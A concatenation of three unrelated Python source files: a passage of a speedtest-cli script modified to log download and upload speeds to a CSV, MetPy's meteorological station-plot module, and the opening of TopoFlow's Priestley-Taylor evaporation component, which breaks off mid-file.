'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('byte', 1), default=('bit', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
help='HTTP timeout in seconds. Default 10')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
socket.setdefaulttimeout(args.timeout)
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
request = build_request(args.mini)
f = urlopen(request)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
request = build_request('%s/speedtest/upload.%s' %
(args.mini, ext))
f = urlopen(request)
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
isp_name = (('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
# This is a line I have added
download.append('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
upload.append('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
headers = {'Referer': 'https://c.speedtest.net/flash/speedtest.swf'}
request = build_request('https://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode(),
headers=headers)
f = catch_request(request)
if f is False:
print_('Could not submit results to speedtest.net')
sys.exit(1)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: https://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
# Print some test output
print("\nData from the most recent run")
print "Download speed:", float(download[0][10:15])
print "Upload speed:", float(upload[0][8:13])
time = [time.strftime("%Y/%d/%m %H:%M:%S")]
# Make a data frame with updated data
temp_speed_frame = pd.DataFrame({"Time": time, "Download": float(
download[0][10:15]), "Upload": float(upload[0][8:13]), "location": isp_name})
# read in the historical data from the speed frame file
speed_frame = pd.read_csv(
"/Users/Nest/Documents/speedtest-cli-master/speed_frame.csv", index_col=None)
print("\nHistorical data from speed frame:")
print(speed_frame)
# Append the new data to the bottom of the speed frame
new_data = speed_frame.append(temp_speed_frame)
print("\nUpdated speed frame")
print(new_data)
# Output results to an updated file
new_data.to_csv(
"/Users/Nest/Documents/speedtest-cli-master/speed_frame.csv", index=False)
|
|
# Copyright (c) 2016 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Create Station-model plots."""
from enum import Enum
import numpy as np
from .wx_symbols import (current_weather, high_clouds, low_clouds, mid_clouds,
pressure_tendency, sky_cover, wx_symbol_font)
from ..package_tools import Exporter
from ..units import atleast_1d
exporter = Exporter(globals())
@exporter.export
class StationPlot(object):
"""Make a standard meteorological station plot.
Plots values, symbols, or text spaced around a central location. Can also plot wind
barbs as the center of the location.
"""
location_names = {'C': (0, 0), 'N': (0, 1), 'NE': (1, 1), 'E': (1, 0), 'SE': (1, -1),
'S': (0, -1), 'SW': (-1, -1), 'W': (-1, 0), 'NW': (-1, 1),
'N2': (0, 2), 'NNE': (1, 2), 'ENE': (2, 1), 'E2': (2, 0),
'ESE': (2, -1), 'SSE': (1, -2), 'S2': (0, -2), 'SSW': (-1, -2),
'WSW': (-2, -1), 'W2': (-2, 0), 'WNW': (-2, 1), 'NNW': (-1, 2)}
def __init__(self, ax, x, y, fontsize=10, spacing=None, transform=None, **kwargs):
"""Initialize the StationPlot with items that do not change.
This sets up the axes and station locations. The `fontsize` and `spacing`
are also specified here to ensure that they are consistent between individual
station elements.
Parameters
----------
ax : matplotlib.axes.Axes
The :class:`~matplotlib.axes.Axes` for plotting
x : array_like
The x location of the stations in the plot
y : array_like
The y location of the stations in the plot
fontsize : int
The fontsize to use for drawing text
spacing : int
The spacing, in points, that corresponds to a single increment between
station plot elements.
transform : matplotlib.transforms.Transform (or compatible)
The default transform to apply to the x and y positions when plotting.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
These will be passed to all the plotting methods, and thus need to be valid
for all plot types, such as `clip_on`.
"""
self.ax = ax
self.x = atleast_1d(x)
self.y = atleast_1d(y)
self.fontsize = fontsize
self.spacing = fontsize if spacing is None else spacing
self.transform = transform
self.items = {}
self.barbs = None
self.arrows = None
self.default_kwargs = kwargs
def plot_symbol(self, location, codes, symbol_mapper, **kwargs):
"""At the specified location in the station model plot a set of symbols.
This specifies that at the offset `location`, the data in `codes` should be
converted to unicode characters (for our :data:`wx_symbol_font`) using `symbol_mapper`,
and plotted.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
codes : array_like
The numeric values that should be converted to unicode characters for plotting.
symbol_mapper : callable
Controls converting data values to unicode code points for the
:data:`wx_symbol_font` font. This should take a value and return a single unicode
character. See :mod:`metpy.plots.wx_symbols` for included mappers.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
.. plot::
import matplotlib.pyplot as plt
import numpy as np
from math import ceil
from metpy.plots import StationPlot
from metpy.plots.wx_symbols import current_weather, current_weather_auto
from metpy.plots.wx_symbols import low_clouds, mid_clouds, high_clouds
from metpy.plots.wx_symbols import sky_cover, pressure_tendency
def plot_symbols(mapper, name, nwrap=12, figsize=(10, 1.4)):
# Determine how many symbols there are and layout in rows of nwrap
# if there are more than nwrap symbols
num_symbols = len(mapper)
codes = np.arange(len(mapper))
ncols = nwrap
if num_symbols <= nwrap:
nrows = 1
x = np.linspace(0, 1, len(mapper))
y = np.ones_like(x)
ax_height = 0.8
else:
nrows = int(ceil(num_symbols / ncols))
x = np.tile(np.linspace(0, 1, ncols), nrows)[:num_symbols]
y = np.repeat(np.arange(nrows, 0, -1), ncols)[:num_symbols]
figsize = (10, 1 * nrows + 0.4)
ax_height = 0.8 + 0.018 * nrows
fig = plt.figure(figsize=figsize, dpi=300)
ax = fig.add_axes([0, 0, 1, ax_height])
ax.set_title(name, size=20)
ax.xaxis.set_ticks([])
ax.yaxis.set_ticks([])
ax.set_frame_on(False)
# Plot
sp = StationPlot(ax, x, y, fontsize=36)
sp.plot_symbol('C', codes, mapper)
sp.plot_parameter((0, -1), codes, fontsize=18)
ax.set_ylim(-0.05, nrows + 0.5)
plt.show()
plot_symbols(current_weather, "Current Weather Symbols")
plot_symbols(current_weather_auto, "Current Weather Auto Reported Symbols")
plot_symbols(low_clouds, "Low Cloud Symbols")
plot_symbols(mid_clouds, "Mid Cloud Symbols")
plot_symbols(high_clouds, "High Cloud Symbols")
plot_symbols(sky_cover, "Sky Cover Symbols")
plot_symbols(pressure_tendency, "Pressure Tendency Symbols")
See Also
--------
plot_barb, plot_parameter, plot_text
"""
# Make sure we use our font for symbols
kwargs['fontproperties'] = wx_symbol_font.copy()
return self.plot_parameter(location, codes, symbol_mapper, **kwargs)
def plot_parameter(self, location, parameter, formatter='.0f', **kwargs):
"""At the specified location in the station model plot a set of values.
This specifies that at the offset `location`, the data in `parameter` should be
plotted. The conversion of the data values to a string is controlled by `formatter`.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
parameter : array_like
The numeric values that should be plotted
formatter : str or callable, optional
How to format the data as a string for plotting. If a string, it should be
compatible with the :func:`format` builtin. If a callable, this should take a
value and return a string. Defaults to '0.f'.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
plot_barb, plot_symbol, plot_text
"""
if hasattr(parameter, 'units'):
parameter = parameter.magnitude
text = self._to_string_list(parameter, formatter)
return self.plot_text(location, text, **kwargs)
def plot_text(self, location, text, **kwargs):
"""At the specified location in the station model plot a collection of text.
This specifies that at the offset `location`, the strings in `text` should be
plotted.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
text : list (or array) of strings
The strings that should be plotted
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
plot_barb, plot_parameter, plot_symbol
"""
location = self._handle_location(location)
kwargs = self._make_kwargs(kwargs)
text_collection = self.ax.scattertext(self.x, self.y, text, loc=location,
size=kwargs.pop('fontsize', self.fontsize),
**kwargs)
if location in self.items:
self.items[location].remove()
self.items[location] = text_collection
return text_collection
def plot_barb(self, u, v, **kwargs):
r"""At the center of the station model plot wind barbs.
Additional keyword arguments given will be passed onto matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function; this is useful for specifying things
like color or line width.
Parameters
----------
u : array-like
The data to use for the u-component of the barbs.
v : array-like
The data to use for the v-component of the barbs.
plot_units: `pint.unit`
Units to plot in (performing conversion if necessary). Defaults to given units.
kwargs
Additional keyword arguments to pass to matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function.
See Also
--------
plot_arrow, plot_parameter, plot_symbol, plot_text
"""
kwargs = self._make_kwargs(kwargs)
# If plot_units specified, convert the data to those units
plotting_units = kwargs.pop('plot_units', None)
u, v = self._plotting_units(u, v, plotting_units)
# Empirically determined
pivot = 0.51 * np.sqrt(self.fontsize)
length = 1.95 * np.sqrt(self.fontsize)
defaults = {'sizes': {'spacing': .15, 'height': 0.5, 'emptybarb': 0.35},
'length': length, 'pivot': pivot}
defaults.update(kwargs)
# Remove old barbs
if self.barbs:
self.barbs.remove()
self.barbs = self.ax.barbs(self.x, self.y, u, v, **defaults)
def plot_arrow(self, u, v, **kwargs):
r"""At the center of the station model plot wind arrows.
Additional keyword arguments given will be passed onto matplotlib's
:meth:`~matplotlib.axes.Axes.quiver` function; this is useful for specifying things
like color or line width.
Parameters
----------
u : array-like
The data to use for the u-component of the arrows.
v : array-like
The data to use for the v-component of the arrows.
plot_units: `pint.unit`
Units to plot in (performing conversion if necessary). Defaults to given units.
kwargs
Additional keyword arguments to pass to matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function.
See Also
--------
plot_barb, plot_parameter, plot_symbol, plot_text
"""
kwargs = self._make_kwargs(kwargs)
# If plot_units specified, convert the data to those units
plotting_units = kwargs.pop('plot_units', None)
u, v = self._plotting_units(u, v, plotting_units)
defaults = {'pivot': 'tail', 'scale': 20, 'scale_units': 'inches', 'width': 0.002}
defaults.update(kwargs)
# Remove old arrows
if self.arrows:
self.arrows.remove()
self.arrows = self.ax.quiver(self.x, self.y, u, v, **defaults)
@staticmethod
def _plotting_units(u, v, plotting_units):
"""Handle conversion to plotting units for barbs and arrows."""
if plotting_units:
if hasattr(u, 'units') and hasattr(v, 'units'):
u = u.to(plotting_units)
v = v.to(plotting_units)
else:
raise ValueError('To convert to plotting units, units must be attached to '
'u and v wind components.')
# Strip units, CartoPy transform doesn't like
u = np.array(u)
v = np.array(v)
return u, v
def _make_kwargs(self, kwargs):
"""Assemble kwargs as necessary.
Inserts our defaults as well as ensures transform is present when appropriate.
"""
# Use default kwargs and update with additional ones
all_kw = self.default_kwargs.copy()
all_kw.update(kwargs)
# Pass transform if necessary
if 'transform' not in all_kw and self.transform:
all_kw['transform'] = self.transform
return all_kw
@staticmethod
def _to_string_list(vals, fmt):
"""Convert a sequence of values to a list of strings."""
if not callable(fmt):
def formatter(s):
"""Turn a format string into a callable."""
return format(s, fmt)
else:
formatter = fmt
return [formatter(v) if np.isfinite(v) else '' for v in vals]
def _handle_location(self, location):
"""Process locations to get a consistent set of tuples for location."""
if isinstance(location, str):
location = self.location_names[location]
xoff, yoff = location
return xoff * self.spacing, yoff * self.spacing
@exporter.export
class StationPlotLayout(dict):
r"""make a layout to encapsulate plotting using :class:`StationPlot`.
This class keeps a collection of offsets, plot formats, etc. for a parameter based
on its name. This then allows a dictionary of data (or any object that allows looking
up of arrays based on a name) to be passed to :meth:`plot()` to plot the data all at once.
See Also
--------
StationPlot
"""
class PlotTypes(Enum):
r"""Different plotting types for the layout.
Controls how items are displayed (e.g. converting values to symbols).
"""
value = 1
symbol = 2
text = 3
barb = 4
def add_value(self, location, name, fmt='.0f', units=None, **kwargs):
r"""Add a numeric value to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted. The conversion of the data values to
a string is controlled by `fmt`. The units required for plotting can also
be passed in using `units`, which will cause the data to be converted before
plotting.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
fmt : str or callable, optional
How to format the data as a string for plotting. If a string, it should be
compatible with the :func:`format` builtin. If a callable, this should take a
value and return a string. Defaults to '0.f'.
units : pint-compatible unit, optional
The units to use for plotting. Data will be converted to this unit before
conversion to a string. If not specified, no conversion is done.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_symbol, add_text
"""
self[location] = (self.PlotTypes.value, name, (fmt, units, kwargs))
def add_symbol(self, location, name, symbol_mapper, **kwargs):
r"""Add a symbol to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted. Data values will converted to glyphs
appropriate for MetPy's symbol font using the callable `symbol_mapper`.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
symbol_mapper : callable
Controls converting data values to unicode code points for the
:data:`wx_symbol_font` font. This should take a value and return a single unicode
character. See :mod:`metpy.plots.wx_symbols` for included mappers.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_text, add_value
"""
self[location] = (self.PlotTypes.symbol, name, (symbol_mapper, kwargs))
def add_text(self, location, name, **kwargs):
r"""Add a text field to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted directly as text with no conversion
applied.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple(float, float)
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_symbol, add_value
"""
self[location] = (self.PlotTypes.text, name, kwargs)
def add_barb(self, u_name, v_name, units=None, **kwargs):
r"""Add a wind barb to the center of the station layout.
This specifies that u- and v-component data should be pulled from the data
container using the keys `u_name` and `v_name`, respectively, and plotted as
a wind barb at the center of the station plot. If `units` are given, both
components will be converted to these units.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or line width.
Parameters
----------
u_name : str
The name of the parameter for the u-component for `barbs`, which is used as
a key to pull data out of the data container passed to :meth:`plot`.
v_name : str
The name of the parameter for the v-component for `barbs`, which is used as
a key to pull data out of the data container passed to :meth:`plot`.
units : pint-compatible unit, optional
The units to use for plotting. Data will be converted to this unit before
conversion to a string. If not specified, no conversion is done.
kwargs
Additional keyword arguments to use for matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function.
See Also
--------
add_symbol, add_text, add_value
"""
# Not sure if putting the v_name as a plot-specific option is appropriate,
# but it seems simpler than making name code in plot handle tuples
self['barb'] = (self.PlotTypes.barb, (u_name, v_name), (units, kwargs))
def names(self):
"""Get the list of names used by the layout.
Returns
-------
list[str]
the list of names of variables used by the layout
"""
ret = []
for item in self.values():
if item[0] == self.PlotTypes.barb:
ret.extend(item[1])
else:
ret.append(item[1])
return ret
def plot(self, plotter, data_dict):
"""Plot a collection of data using this layout for a station plot.
This function iterates through the entire specified layout, pulling the fields named
in the layout from `data_dict` and plotting them using `plotter` as specified
in the layout. Fields present in the layout, but not in `data_dict`, are ignored.
Parameters
----------
plotter : StationPlot
:class:`StationPlot` to use to plot the data. This controls the axes,
spacing, station locations, etc.
data_dict : dict[str, array-like]
Data container that maps a name to an array of data. Data from this object
will be used to fill out the station plot.
"""
def coerce_data(dat, u):
try:
return dat.to(u).magnitude
except AttributeError:
return dat
for loc, info in self.items():
typ, name, args = info
if typ == self.PlotTypes.barb:
# Try getting the data
u_name, v_name = name
u_data = data_dict.get(u_name)
v_data = data_dict.get(v_name)
# Plot if we have the data
if not (v_data is None or u_data is None):
units, kwargs = args
plotter.plot_barb(coerce_data(u_data, units), coerce_data(v_data, units),
**kwargs)
else:
# Check that we have the data for this location
data = data_dict.get(name)
if data is not None:
# If we have it, hand it to the appropriate method
if typ == self.PlotTypes.value:
fmt, units, kwargs = args
plotter.plot_parameter(loc, coerce_data(data, units), fmt, **kwargs)
elif typ == self.PlotTypes.symbol:
mapper, kwargs = args
plotter.plot_symbol(loc, data, mapper, **kwargs)
elif typ == self.PlotTypes.text:
plotter.plot_text(loc, data, **args)
def __repr__(self):
"""Return string representation of layout."""
return ('{'
+ ', '.join('{0}: ({1[0].name}, {1[1]}, ...)'.format(loc, info)
for loc, info in sorted(self.items()))
+ '}')
with exporter:
#: :desc: Simple station plot layout
simple_layout = StationPlotLayout()
simple_layout.add_barb('eastward_wind', 'northward_wind', 'knots')
simple_layout.add_value('NW', 'air_temperature', units='degC')
simple_layout.add_value('SW', 'dew_point_temperature', units='degC')
simple_layout.add_value('NE', 'air_pressure_at_sea_level', units='mbar',
fmt=lambda v: format(10 * v, '03.0f')[-3:])
simple_layout.add_symbol('C', 'cloud_coverage', sky_cover)
simple_layout.add_symbol('W', 'present_weather', current_weather)
#: Full NWS station plot `layout`__
#:
#: __ http://oceanservice.noaa.gov/education/yos/resource/JetStream/synoptic/wxmaps.htm
nws_layout = StationPlotLayout()
nws_layout.add_value((-1, 1), 'air_temperature', units='degF')
nws_layout.add_symbol((0, 2), 'high_cloud_type', high_clouds)
nws_layout.add_symbol((0, 1), 'medium_cloud_type', mid_clouds)
nws_layout.add_symbol((0, -1), 'low_cloud_type', low_clouds)
nws_layout.add_value((1, 1), 'air_pressure_at_sea_level', units='mbar',
fmt=lambda v: format(10 * v, '03.0f')[-3:])
nws_layout.add_value((-2, 0), 'visibility_in_air', fmt='.0f', units='miles')
nws_layout.add_symbol((-1, 0), 'present_weather', current_weather)
nws_layout.add_symbol((0, 0), 'cloud_coverage', sky_cover)
nws_layout.add_value((1, 0), 'tendency_of_air_pressure', units='mbar',
fmt=lambda v: ('-' if v < 0 else '') + format(10 * abs(v), '02.0f'))
nws_layout.add_symbol((2, 0), 'tendency_of_air_pressure_symbol', pressure_tendency)
nws_layout.add_barb('eastward_wind', 'northward_wind', units='knots')
nws_layout.add_value((-1, -1), 'dew_point_temperature', units='degF')
# TODO: Fix once we have the past weather symbols converted
nws_layout.add_symbol((1, -1), 'past_weather', current_weather)
|
|
#
# NB! See note at "THIS MAY BE COSTLY"
#-------------------------------------------
#
# Copyright (c) 2001-2014, Scott D. Peckham
#
# Sep 2014. New standard names and BMI updates and testing.
# Aug 2014. Updates to standard names and BMI.
# Wrote latent_heat_of_evaporation(); not used yet.
# Moved update_water_balance() to satzone_base.py.
# Nov 2013. Converted TopoFlow to Python package.
# Feb 2013. Adapted to use EMELI framework.
# Jan 2013. Revised handling of input/output names.
# Oct 2012. CSDMS Standard Names and BMI.
# May 2010. Changes to initialize() and read_cfg_file().
# Aug 2009. Updates.
# Jul 2009. Updates.
# May 2009. Updates.
# Apr 2009. Updates.
# Jan 2009. Converted from IDL to Python with I2PY.
#
#-----------------------------------------------------------------------
# NOTES: This file defines a Priestley-Taylor ET component
# and related functions. It inherits from the ET
# "base class" in "evap_base.py".
#-----------------------------------------------------------------------
#
# class evap_component
#
# get_attribute() # (10/26/11)
# get_input_var_names() # (5/15/12)
# get_output_var_names() # (5/15/12)
# get_var_name() # (5/16/12), Bolton
# get_var_units() # (5/16/12), Bolton
# ------------------------
# check_input_types()
# update_ET_rate()
# ------------------------
# open_input_files()
# read_input_files()
# close_input_files()
#
# Functions:
# Priestley_Taylor_ET_Rate
#
#-----------------------------------------------------------------------
import numpy as np
import os
from topoflow.components import evap_base
from topoflow.utils import model_input
#-----------------------------------------------------------------------
class evap_component( evap_base.evap_component ):
#-------------------------------------------------------------------
_att_map = {
'model_name': 'TopoFlow_Evaporation_Priestley_Taylor',
'version': '3.1',
'author_name': 'Scott D. Peckham',
'grid_type': 'uniform',
'time_step_type': 'fixed',
'step_method': 'explicit',
#------------------------------------------------------
'comp_name': 'EvapPriestleyTaylor',
'model_family': 'TopoFlow',
'cfg_template_file': 'Evap_Priestley_Taylor.cfg.in',
'cfg_extension': '_evap_priestley_taylor.cfg',
'cmt_var_prefix': '/EvapPriestleyTaylor/Input/Var/',
'gui_xml_file': '/home/csdms/cca/topoflow/3.1/src/share/cmt/gui/Evap_Priestley_Taylor.xml',
'dialog_title': 'Evaporation: Priestley-Taylor Parameters',
'time_units': 'seconds' }
#----------------------------------------------------------------
# Note that the "meteorology" component uses the following to
# compute Q_sum and Qe, but they aren't needed directly here:
# uz, z, z0_air, rho_air, Cp_air, Qn_SW, Qn_LW
#----------------------------------------------------------------
_input_var_names = [
'atmosphere_bottom_air__temperature', # (meteorology)
'land_surface_net-longwave-radiation__energy_flux', # (meteorology)
'land_surface_net-shortwave-radiation__energy_flux', # (meteorology)
'land_surface__temperature' ] # (meteorology)
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth', # (@channels)
# 'soil_top-layer__porosity', # (@satzone)
# 'soil_top-layer__saturated_thickness', # (@satzone)
# 'soil_water_sat-zone_top_surface__elevation' ] # (@satzone)
#-------------------------------------------------
# These are currently obtained from the GUI/file
# and are not obtained from other components.
#-------------------------------------------------
## 'land_surface__elevation', # (GUI, DEM)
## 'land_surface_water__priestley-taylor_alpha_coefficient' # (GUI, alpha)
## 'soil__reference_depth_temperature', # (GUI, T_soil_x)
## 'soil_surface__temperature', # (GUI, T_surf)
## 'soil__temperature_reference_depth', # (GUI, soil_x)
## 'soil__thermal_conductivity' : # (GUI, K_soil)
#----------------------------------------------------
# These could be added in the future; not used yet.
#----------------------------------------------------
## 'soil_model_top_layer__saturated_water_content', # (satzone comp)
## 'land_surface_water_potential_evaporation_rate':'PET' }
_output_var_names = [
'land_surface_soil__conduction_heat_flux', # (Qc)
'land_surface_water__domain_time_integral_of_evaporation_volume_flux', # (vol_ET)
'land_surface_water__evaporation_volume_flux', # (ET)
'model__time_step' ] # (dt)
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
#'land_surface__elevation',
#'land_surface_water__priestley-taylor_alpha_coefficient',
#'soil__reference_depth_temperature',
## 'soil_surface__temperature',
#'soil__temperature_reference_depth',
#'soil__thermal_conductivity' ]
#----------------------------------------------------------------
# Should we use "ponded_water__depth" or "surface_water__depth"
# instead of "channel_water__depth" in this case ?
#----------------------------------------------------------------
# Should we use "soil_surface__temperature" or
# "land_surface__temperature" here ? (Both, for now.)
#----------------------------------------------------------------
_var_name_map = {
'atmosphere_bottom_air__temperature' : 'T_air',
'land_surface__temperature': 'T_surf',
'land_surface_net-longwave-radiation__energy_flux': 'Qn_LW',
'land_surface_net-shortwave-radiation__energy_flux': 'Qn_SW',
#---------------------------------------------------------------
'land_surface_soil__conduction_heat_flux' : 'Qc', # (computed)
'land_surface_water__domain_time_integral_of_evaporation_volume_flux': 'vol_ET',
'land_surface_water__evaporation_volume_flux' : 'ET',
'model__time_step': 'dt',
#-----------------------------------------------------
# These are read from GUI/file, but can be returned.
#-----------------------------------------------------
'land_surface__elevation' : 'DEM',
'land_surface_water__priestley-taylor_alpha_coefficient': 'alpha',
'soil__reference_depth_temperature' : 'T_soil_x',
# 'soil_surface__temperature' : 'T_surf', # (from met)
'soil__temperature_reference_depth': 'soil_x',
'soil__thermal_conductivity' : 'K_soil' } # (thermal !)
#----------------------------------------------
# These are no longer needed here. (9/25/14)
#----------------------------------------------
# 'channel_water_x-section__mean_depth' : 'depth',
